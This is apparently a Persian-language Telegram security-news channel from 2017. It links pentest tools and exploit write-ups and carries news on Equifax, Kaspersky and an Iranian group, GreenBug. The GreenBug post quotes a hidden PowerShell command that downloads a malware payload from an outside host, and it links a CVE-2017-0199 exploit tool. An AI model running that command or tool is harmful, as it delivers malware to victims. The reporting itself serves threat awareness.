تشریح باگ LFI
Local File inclusion

https://hakin9.org/web-application-penetration-testing-local-file-inclusion-lfi-testing/

#pentest
#web
#hack
#lfi

وب سایت شخصی بشار اسد توسط هکرهای ترکیه ای دیفیس شد

#news

Yuki Chan The Auto Pentest
ابزار Yuki Chan برای تست نفوذ بصورت اتوماتیک

قابلیت ها:


Automated
Intel-Gathering
Vulnerability Analysis
Security Auditing
OSINT
Tracking
System Enumeration
Fuzzing
CMS Auditing
SSL Security Auditing
And Off Course This Tool Designed For Targetted Pentesting Too



دانلود:

https://github.com/Yukinoshita47/Yuki-Chan-The-Auto-Pentest


#pentest
#web
#osint
#enum
#linux

توابع خطرناک جاوا اسکریپت

https://blog.blueclosure.com/2017/09/javascript-dangerous-functions-part-1.html

#js
#html

بعد از استعفای برخی مدیران شرکت equifax کاربران در حال شوخی با مدرک مسوول مستعفی امنیت سایت هستن.
(به نظر ایشون مدرک موسیقی از الان دیگه به کار خانم مدیر میاد!)

#fun

سه راه برای وارد شدن به دانشگاه هاروارد از نظر جولیان آسانژ (مالک ویکی لیکس):
رشوه بده
مورد تایید CIA باش (بعد از رد افشاگر CIA،چلسی منینگ برای رفتن به هاروارد)
آسیایی نباش!

منابع :
https://twitter.com/wikileaks/status/590203087333232640?lang=en

https://www.nytimes.com/2017/09/15/opinion/chelsea-manning-harvard-michael-morell.html?mcubz=3&_r=0

https://www.unz.com/runz/the-myth-of-american-meritocracy/

چرا Deep Learning

به گزارش بی بی سی بعد از اعلام بلومبرگ مبنی بر ارسال ایمیل مدیر اجرایی kaspersky به کارمند سابق این شرکت که در اون در مورد یک پروژه امنیتی که با سرویس امنیتی دولت روسیه در حال اجرا هستند توضیح داده ، دولت امریکا استفاده از تمامی محصولات کسپرسکای رو در ادارات دولتی ممنوع اعلام کرد.
کسپرسکای در حال حاضر بیش از ۴۰۰ میلیون مشتری و کاربر در تمام دنیا داره و بلومبرگ اعلام کرده ابزارهای این شرکت نه تنها در مورد حملات سایبری آدرس اشتباهی میدن بلکه هکرهای شناسایی شده در طی این حملات رو به سرویس امنیتی روسیه (FSB) معرفی میکنن.

اما کسپرسکای معتقده این اطلاعات حقیقت نداشته و این شرکت قربانی درگیری و رقابت سیاسی بین این دو کشور هست.

#news
#usa
#russia
#fsb
#nsa
#cia
#kaspersky

iphone X
hands-on

#engadget

آنالیز باگ Apache Struts2

https://blog.gdssecurity.com/labs/2017/3/27/an-analysis-of-cve-2017-5638.html

#equihax #equifax #vulnerability

کانال پابلیک شد

@sec_nerd

توضیحی در مورد نحوه هک کردن پرینترها


https://0x00sec.org/t/an-introduction-to-printer-exploitation-1/3565


#printer
#network
#nmap
#smb
#shodan


@sec_nerd

میزان مصرف دیتا به ازای کیفیت های مختلف ویدیو در یوتیوب

@sec_nerd

پلاگین decoder برای افزایش قابلیت های دکدینگ Burp suite

https://github.com/nccgroup/Decoder-Improved

#burpsuite
#decoder
#jar

@sec_nerd

Exploiting CVE-2017-8759: SOAP WSDL Parser Code Injection

https://www.mdsec.co.uk/2017/09/exploiting-cve-2017-8759-soap-wsdl-parser-code-injection/

#xml
#wsdl


@sec_nerd

شرکت equifax اعلام کرد ۴۰۰ هزار شهروند بریتانیایی با هک شدن این سایت در معرض خطر قرار دارند.

#news
#equifax

@sec_nerd

حل مسائل فیزیک در لینوکس

https://www.linuxjournal.com/content/solving-physics-problems-linux

#linux
#calculation

@sec_nerd

سایت clearsky در گزارشی، توضیحاتی در مورد فعالیت های گروه ایرانی GreenBug ارائه کرد.این گروه از تروجانی به نام ISMAgent برای آلوده کردن سیستمها استفاده میکنند.ابزار مورد استفاده در این حملات از آسیب پذیری آفیس با کد CVE-2017-0199 استفاده کرده که توضیحات بیشتری در مورد این باگ در https://github.com/bhdresh/CVE-2017-0199 به همراه ابزار مورد نیاز موجود هست. این حمله با فراخوانی ظاهری فایلی به اسم template.rtf و اجرای دستور:
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nologo -WindowStyle Hidden $webClient = New-Object https://System.Net .WebClient; $val = $webClient.DownloadString(‘https://a.pomf[.]cat/ntluca.txt ‘); add-content -path ‘C:\Users\USER\AppData\Roaming/srvRep.txt’ -value $val -force
در پشت صحنه فایل ntluca.txt رو که فایل اصلی این حمله هست دانلود و دکد میکنه (base64 digital certificate) .

توضیحات بیشتر :
https://www.clearskysec.com/ismagent/

#iran
#usa
#ksa
#israel
#russia
#malware
#windows
#greenbug


@sec_nerd